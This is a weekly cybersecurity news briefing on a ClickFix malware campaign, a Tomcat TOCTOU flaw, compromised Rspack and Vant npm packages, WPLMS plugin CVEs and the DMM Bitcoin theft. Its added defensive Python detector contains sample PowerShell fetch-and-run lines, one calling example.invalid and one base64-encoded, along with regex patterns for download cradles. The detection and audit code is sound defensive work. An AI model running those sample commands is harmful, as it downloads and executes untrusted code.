Cyber Security Weekly Briefing, 21 - 27 December

December 27, 2024

New social engineering campaign to distribute malware

Malwarebytes has discovered a new social engineering campaign impersonating multiple software brands. The attackers use web pages that imitate legitimate software download sites; once the file is downloaded, the page shows a fake browser error claiming that the downloaded document cannot be displayed correctly offline and urges the victim to resolve it with a "Fix it" button.

This technique has been used before in the campaigns known as ClearFake and ClickFix and is characterized by getting the user to run a PowerShell command by hand; in this case the command is copied to the clipboard when the "Fix it" button is clicked. The user is then told to press Windows+R to open the Run dialog, paste the copied command and execute it. Once run, the command fingerprints the victim's machine and downloads a payload. Because the victim launches the command themselves, no exploit or macro is involved: what a defender sees is a PowerShell process whose parent is explorer.exe (the process that hosts the Run dialog), and the pasted text is left behind in the user's RunMRU registry key.
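The parent-process and command-line traits described above can be turned into a simple detection rule. The following is an added example, not code from the Malwarebytes report: it scores process-creation events for an explorer.exe parent plus the usual markers of a pasted one-liner (hidden window, execution policy bypass, encoded command, download cradle, in-memory execution). The events are constructed, and the field names parent_image, image and command_line are an assumption to be mapped onto your Sysmon Event ID 1 or EDR schema.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry.

Added example, not code from the Malwarebytes report. The events below are
constructed, and the field names (parent_image, image, command_line) are an
assumption: map them onto your Sysmon Event ID 1 or EDR schema.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


# The Run dialog (Win+R) is hosted by explorer.exe, so a shell spawned from
# a pasted command shows explorer.exe as its parent.
RUN_DIALOG_PARENT = "explorer.exe"
SHELLS = {"powershell.exe", "pwsh.exe"}

# Traits common to clipboard-pasted one-liners: hidden window, execution policy
# bypass, base64-encoded command, download cradle, in-memory execution.
TRAITS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"-(?:ep|ex|executionpolicy)\s+bypass", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)),
    ("in_memory_exec", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
]


def score(ev: ProcEvent) -> list[str]:
    """Return the names of the traits an event matches (empty if not a shell)."""
    if _basename(ev.image) not in SHELLS:
        return []
    hits = [name for name, rx in TRAITS if rx.search(ev.command_line)]
    if _basename(ev.parent_image) == RUN_DIALOG_PARENT:
        hits.append("parent_is_explorer")
    return hits


def is_clickfix_like(ev: ProcEvent) -> bool:
    """Explorer-parented shell plus at least one malicious-looking trait."""
    hits = score(ev)
    return "parent_is_explorer" in hits and len(hits) >= 2


def flag_events(events: list[ProcEvent]) -> list[int]:
    """Indices of events that match the ClickFix pattern."""
    return [i for i, ev in enumerate(events) if is_clickfix_like(ev)]


# Constructed sample telemetry (not real captures). The base64 blob in the
# second event is UTF-16LE "IEX (New-Object Net.WebClient)", a typical cradle.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iex (irm https://example.invalid/fix)"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -ep bypass -enc "
              "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -File C:\scripts\nightly-backup.ps1"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell"),
]

if __name__ == "__main__":
    for i in flag_events(SAMPLE_EVENTS):
        print(f"event {i}: {score(SAMPLE_EVENTS[i])}")
```

The rule deliberately requires two signals: an explorer.exe parent alone also describes a user opening PowerShell from the Start menu (the last sample event), so that one is not flagged. Tune the trait list against your own baseline before alerting on it.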


Incomplete Apache Tomcat patch leads vendor to issue a new CVE

Apache has released a new security update for a bug in Apache Tomcat that could allow remote code execution. It is tracked as CVE-2024-56337 and was identified by Apache after the fix for CVE-2024-50379 (CVSSv3 9.8) turned out to be incomplete. Both CVEs describe the same bug, but the vendor chose to assign a new ID because the original patch was not sufficient to secure affected systems.

Both are race condition bugs, specifically time-of-check to time-of-use (TOCTOU), and affect deployments where the default servlet has write access enabled (its readonly initialization parameter set to false, which is not Tomcat's shipped default) and that run on a case-insensitive file system such as Windows. Because the complete fix also depends on the JVM's canonical file name cache, Apache's advisory asks administrators running Java 8 or 11 to set the system property sun.io.useCanonCaches to false explicitly in addition to upgrading (Java 17 already defaults it to false, and Java 21 and later no longer have the property).


Malicious versions of Rspack and Vant detected

Three popular npm packages, @rspack/core, @rspack/cli and vant, were compromised using stolen npm account tokens, which let the attackers publish malicious versions carrying cryptocurrency miners in a new supply chain attack. According to research by Sonatype and Socket, the attackers deployed the XMRig miner and used post-install scripts so that it ran automatically as soon as the package was installed.

The malicious code was reportedly hidden in configuration files and fetched instructions from C2 servers. It also performed reconnaissance through the ipinfo.io geolocation API, collecting network data about the host. The XMRig binary was downloaded from GitHub and launched with parameters that capped CPU usage, trading mining throughput for evasion. Rspack, a JavaScript bundler, and Vant, a UI library for Vue.js, confirmed the compromise of their npm accounts and released clean versions.

Rspack advises avoiding version 1.1.7 and upgrading to 1.1.8, while Vant lists several affected versions and recommends upgrading to v4.9.15 or higher.
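Two things follow from this incident for anyone maintaining a JavaScript project: pinned lockfiles need to be checked against the bad versions, and install-time scripts are the mechanism that turned a package download into code execution. The following is an added example, not tooling from Sonatype, Socket, Rspack or Vant. It audits a package-lock.json (lockfileVersion 2 or 3) for the compromised Rspack releases and for Vant below the version the briefing names, and it flags every package npm has marked with hasInstallScript. The lockfile excerpt is constructed; Vant's older release lines need the project's own advisory list, which is not reproduced here.

```python
"""Audit a package-lock.json (lockfileVersion 2 or 3) for the compromised
Rspack and Vant releases and for packages that run install-time scripts.

Added example, not tooling from Sonatype, Socket, Rspack or Vant. The lockfile
below is constructed. The version data encodes only what the briefing states:
@rspack/core and @rspack/cli 1.1.7 are the malicious releases, and Vant should
be at 4.9.15 or higher.
"""
from __future__ import annotations

import json

BAD_EXACT = {"@rspack/core": {"1.1.7"}, "@rspack/cli": {"1.1.7"}}
MIN_SAFE = {"vant": "4.9.15"}


def parse_version(v: str) -> tuple[int, ...]:
    """Numeric semver core; pre-release and build metadata are ignored."""
    core = v.split("+", 1)[0].split("-", 1)[0]
    return tuple(int(p) for p in core.split("."))


def installed_packages(lock: dict):
    """Yield (name, version, entry) for every installed package in the lockfile."""
    for path, entry in lock.get("packages", {}).items():
        if not path:  # "" is the root project itself
            continue
        name = path.rsplit("node_modules/", 1)[-1]  # handles nested and scoped paths
        yield name, entry.get("version", ""), entry


def audit_lock(lock: dict) -> list[tuple[str, str, str]]:
    """Return (name, version, reason) findings; an empty list means nothing flagged."""
    findings = []
    for name, version, entry in installed_packages(lock):
        if version in BAD_EXACT.get(name, set()):
            findings.append((name, version, "known compromised release"))
        elif name in MIN_SAFE and parse_version(version) < parse_version(MIN_SAFE[name]):
            findings.append((name, version, f"below fixed version {MIN_SAFE[name]}"))
        # npm records lifecycle scripts here; they run automatically on install,
        # which is exactly how the miner in this campaign was launched.
        if entry.get("hasInstallScript"):
            findings.append((name, version, "runs an install-time script"))
    return findings


# Constructed lockfile excerpt (not a real project).
SAMPLE_LOCK = json.loads("""{
  "name": "demo-app", "lockfileVersion": 3, "packages": {
    "": {"name": "demo-app", "dependencies": {"@rspack/core": "^1.1.7", "vant": "^4.9.14"}},
    "node_modules/@rspack/core": {"version": "1.1.7", "hasInstallScript": true},
    "node_modules/vant": {"version": "4.9.14"},
    "node_modules/lodash": {"version": "4.17.21"}
  }
}""")

if __name__ == "__main__":
    import sys
    lock = json.load(open(sys.argv[1], encoding="utf-8")) if len(sys.argv) > 1 else SAMPLE_LOCK
    for name, version, reason in audit_lock(lock):
        print(f"{name}@{version}: {reason}")
```

The install-script finding is informational rather than a verdict, since many legitimate native modules build on install; the point is to know which packages get to run code the moment they land on a developer machine or CI runner. Setting ignore-scripts=true in .npmrc and re-enabling scripts only for the packages that genuinely need them removes this path for everything else.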


Critical vulnerabilities fixed in WordPress plugins

Patchstack researchers have identified multiple critical vulnerabilities in the WPLMS and VibeBP plugins bundled with the WPLMS WordPress theme, a popular learning management system with more than 28,000 sales. The flaws include an arbitrary file upload, CVE-2024-56046 (CVSSv3 10.0); a privilege escalation, CVE-2024-56043 (CVSSv3 9.8); and a SQL injection, CVE-2024-56042 (CVSSv3 9.2). They affect registration forms and REST API endpoints. In total, 18 flaws were reported, several of them critical, exposing sites to remote code execution, unauthorized administrative control and leakage of sensitive data.

The developers fixed the issues in WPLMS 1.9.9.5.3 and VibeBP 1.9.9.7.7 by adding stricter input validation, restricting file uploads and hardening login handling.


FBI attributes the theft of more than $300 million to TraderTraitor

The FBI, the Department of Defense Cyber Crime Center (DC3) and Japan's National Police Agency have issued a joint notice attributing the theft of more than $300 million in cryptocurrency to the malicious actor TraderTraitor. According to the authorities, the group is also tracked as Jade Sleet, UNC4899 and Slow Pisces and is associated with the North Korean government.

The attack in question is a cryptoasset theft that took place in May 2024 and hit the Japanese exchange DMM Bitcoin. It began with the actor posing as a recruiter on LinkedIn and contacting an employee of Ginco, a cryptocurrency wallet software company, who was tricked into copying a malicious Python script hosted on the attacker's GitHub page. That malware gave the attackers a foothold in Ginco, from which they moved laterally to DMM.
